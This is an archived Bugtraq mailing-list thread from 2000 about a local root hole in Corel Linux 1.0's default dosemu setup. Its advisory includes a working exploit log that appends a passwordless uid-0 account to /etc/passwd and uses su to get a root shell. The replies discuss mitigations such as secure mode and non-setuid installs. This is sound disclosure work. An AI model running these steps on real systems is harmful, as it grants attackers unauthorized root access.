4861012 2000-03-03 18:52 /100 rader/ Postmaster
Mottagare: Bugtraq (import) <10093>
Ärende: Corel Linux 1.0 dosemu default configuration: Local root vuln
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: bugtraq@securityfocus.com
Message-ID: <200003020436.PAA20168@jawa.chilli.net.au>
Date: Tue, 2 Mar 0100 04:47:11 +0000
Reply-To: suid@SUID.KG
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: suid@SUID.KG
X-To: bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
Re all,
Hadn't seen this one around yet, has been on my site for about a week
now.
Corel's mailserver bounced me about this IIRC? Whats up Corel?
Cheers.
----------------------------
suid@suid.kg - Corel Linux dosemu config error. Local root compromise.
Software: Corel Linux 1.0 dosemu distribution configuration
URL: http://linux.corel.com
Version: Version 1.0
Platforms: Corel Linux only.
Type: Default misconfiguration. Noone reads README anymore??
Summary:
Local users can take advantage of a packaging and configuration
error (which has been known and documented for a long time) to
execute arbitrary commands as root.
We see from the doc/README/SECURITY file as well as
http://www.dosemu.org/docs/README/0.98/README-3.html
written in 1997 that this configuration is bad.
Vulnerability:
The system.com command is available to any user who runs the
dos emulator. This is a direct violation of the advice from
the SECURITY readme file:
Never allow the 'system.com' command (part of dosemu)
to be executed. It makes dosemu
execute the libc 'system() function'. Though privileges
are turned off, the process inherits the
switched uid-setting (uid=root, euid=user), hence the
unix process can use setreuid to gain root
access back. ... the rest you can imagine your self.
Exploit:
This is a script log which details how to reproduce this:
Script started on Fri Feb 25 13:54:00 2000
nebula:~$ id
uid=1000(suid) gid=1000(suid) groups=1000(suid)
nebula:~$ cat > hack-corel
#!/bin/bash
echo "owned::0:0::/:/bin/bash" >> /etc/passwd
^D
nebula:~$ chmod a+rx hack-corel
nebula:~$ export PATH="$PATH:."
nebula:~$ dos
CPU speed set to 430/1 MHz
Running on CPU=586, FPU=1, rdtsc=1
[ snip bunch of dosemu crap ]
"Welcome to dosemu 0.98!
C:\> system hack-corel;
sh: : command not found
C:\> exitERROR: general protection at 0x3f0ff: 0
ERROR: SIGSEGV, protected insn...exiting!
nebula:~$ tail -1 /etc/passwd
owned::0:0::/:/bin/bash
nebula:~$ su owned
nebula:/home/suid# id
uid=0(root) gid=0(root) groups=0(root)
nebula:/home/suid# exit
exit
nebula:~$ exit
Script done on Fri Feb 25 13:55:27 2000
Note:
This is not a vulnerability in dosemu itself. The documentation
warns users very specifically that this will happen if the system
is configured as such.
Greets:
duke
cr
active
(4861012) ------------------------------------------(Ombruten)
4870140 2000-03-07 08:14 /66 rader/ Postmaster
Mottagare: Bugtraq (import) <10116>
Ärende: Re: Corel Linux 1.0 dosemu default configuration: Local root vuln
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: bugtraq@securityfocus.com
Mail-Followup-To: bugtraq@securityfocus.com
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-sha1
protocol="application/pgp-signature";
boundary="vOmOzSkFvhd7u8Ms" X-Sender: whitevampire@mindless.com
X-Disclaimer: If you dislike what I say, you do not have to read it.
Deal. X-Copyright: Applicable parts of this eMail (c) 2000 WHiTe
VaMPiRe
Project Gamma.
X-GammaForce: The Gamma Force is strong with this one
(irc.gammaforce.org/www.gammaforce.org)
X-PGP: Public PGP key is available a
http://projectgamma.com/archives/files/pgp.asc (ID: 0x7103CA5F)
Message-ID: <20000303025417.C1413@nirvana.projectgamma.com>
Date: Fri, 3 Mar 2000 02:54:17 -0500
Reply-To: whitevampire@mindless.com
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: "VaMPiRe, WHiTe" <whitvamp@mindless.com>
X-To: bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <200003020436.PAA20168@jawa.chilli.net.au>; from suid@SUID.KG o
Thu, Mar 02, 2000 at 04:47:11AM +0000
--vOmOzSkFvhd7u8Ms
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: quoted-printable
On Thu, Mar 02, 2000 at 04:47:11AM +0000, suid@SUID.KG(suid@SUID.KG) wrote:
<snip>
: Summary:
:=20
: Local users can take advantage of a packaging and configuration
: error (which has been known and documented for a long time) to
: execute arbitrary commands as root.
:=20
: We see from the doc/README/SECURITY file as well as
: http://www.dosemu.org/docs/README/0.98/README-3.html
: written in 1997 that this configuration is bad.
<snip>
Tested default configuration of dosemu on Slackware 7.0, no
vulnerability.
Regards,
--=20
__ ______ ____
/ \ / \ \ / / WHiTe VaMPiRe\Rem
\ \/\/ /\ Y / whitevampire@mindless.com
\ / \ / http://www.projectgamma.com/
\__/\ / \___/ http://www.gammaforce.org/
\/ "Silly hacker, root is for administrators."
--vOmOzSkFvhd7u8Ms
Content-Type: application/pgp-signature
-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.1
iQA/AwUBOL9vp9/q8ZpxA8pfEQKkdwCgwh68tX6NWe21l9JLkhIb3JEtAn4AnAtR
Frbg9nvoZiReJxpso6qhQu2w
=D8oK
-----END PGP SIGNATURE-----
--vOmOzSkFvhd7u8Ms--
(4870140) ------------------------------------------(Ombruten)
4871005 2000-03-07 10:56 /36 rader/ Postmaster
Mottagare: Bugtraq (import) <10134>
Ärende: Re: Corel Linux 1.0 dosemu default configuration: Local root vuln
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: bugtraq@securityfocus.com
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID: <14530.56345.699613.823666@mercury.st.hmc.edu>
Date: Sun, 5 Mar 2000 14:13:45 -0800
Reply-To: Nate Eldredge <neldredge@HMC.EDU>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Nate Eldredge <neldredge@HMC.EDU>
X-To: bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
I note that this has been added to the Vulnerabilities Database on
www.securityfocus.org (#1030) with the following solution:
> The system.com program should be removed from the dosemu heirarchy.
I don't think this is adequate. system.com is a fairly short file
(300 bytes), and if a user has any way to create files inside the
dosemu hierarchy (as they probably do, because otherwise dosemu is of
limited value), they can easily re-create it.
Correct fixes are listed at
http://www.dosemu.org/docs/README/0.98/README-3.html , the URL
referenced before. Such as setting secure mode in the configuration
files.
(Note that I haven't tested this as I can't reproduce the
vulnerability with my current dosemu configuration.)
--
Nate Eldredge
neldredge@hmc.edu
(4871005) ------------------------------------------
4871100 2000-03-07 11:09 /44 rader/ Postmaster
Mottagare: Bugtraq (import) <10135>
Ärende: Re: Corel Linux 1.0 dosemu default configuration: Local root vuln
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: BUGTRAQ@SECURITYFOCUS.COM
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-ID: <20000304165521.1EC.0@bobanek.nowhere.cz>
Date: Sat, 4 Mar 2000 18:11:30 +0100
Reply-To: Pavel Kankovsky <peak@ARGO.TROJA.MFF.CUNI.CZ>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Pavel Kankovsky <peak@ARGO.TROJA.MFF.CUNI.CZ>
X-To: BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <200003020436.PAA20168@jawa.chilli.net.au>
On Tue, 2 Mar 100 suid@SUID.KG wrote:
> Local users can take advantage of a packaging and configuration
> error (which has been known and documented for a long time) to
> execute arbitrary commands as root.
I can not speak for DOSEMU developers but it is my impression you are
supposed to know what you are doing, what risk you accept (and the
risk in far from negligible), and the ways the risk can be mitigated
("secure on", "dpmi off" (*), /etc/dosemu/users) if you install
DOSEMU setuid root, and that installing it in this way by default in
the name of user- friendliness or whatever is a VERY BAD
THING. Whether the package includes system.com binary or not is
irrelevant (**). Yes, I know Corel is not the only vendor who is
guilty--even if we limit ourselves to Linux distros (in fact, the
package in question is probably an unmodified Debian package).
(*) I wonder whether newer versions of doc/README/SECURITY mention
that (at least according to what I heard from Hans Lermen) DPMI
programs can invoke Linux syscalls directly and circumvent any walls
DOSEMU itself raised to protect itself (unless some incredibly
creative protection was invented since version 0.97).
(**) As long as a user can make the virtual machine execute arbitrary
code (I'd like to see a useful installation making this impossible),
he can create and run his own program calling the problematic
subfunction of interrupt 0xE6 (or doing other nasty things).
--Pavel Kankovsky aka Peak [ Boycott Microsoft--http://www.vcnet.com/bms ]
"Resistance is futile. Open your source code and prepare for assimilation."
(4871100) ------------------------------------------(Ombruten)
4875262 2000-03-08 10:06 /16 rader/ Brevbäraren (som är implementerad i) Python
Mottagare: Bugtraq (import) <10150>
Ärende: Re: Corel Linux 1.0 dosemu default configuration: Local root vuln
------------------------------------------------------------
On Fri, Mar 03, 2000 at 10:33:51AM -0800, Seth R Arnold wrote:
> I tested this on debian's dosemu, Version: 0.98.8-2, (debian woody) and
And more important Debian potato which will be released soon also has
the 0.98.8-2 version. The difference is simply that the actual Debian
package is NOT installed setuid. Thus the exploit simply does not
work anymore.
Michael
--
Michael Meskes | Go SF 49ers!
Th.-Heuss-Str. 61, D-41812 Erkelenz | Go Rhein Fire!
Tel.: (+49) 2431/72651 | Use Debian GNU/Linux!
Email: Michael@Fam-Meskes.De | Use PostgreSQL!
(4875262) ------------------------------------------(Ombruten)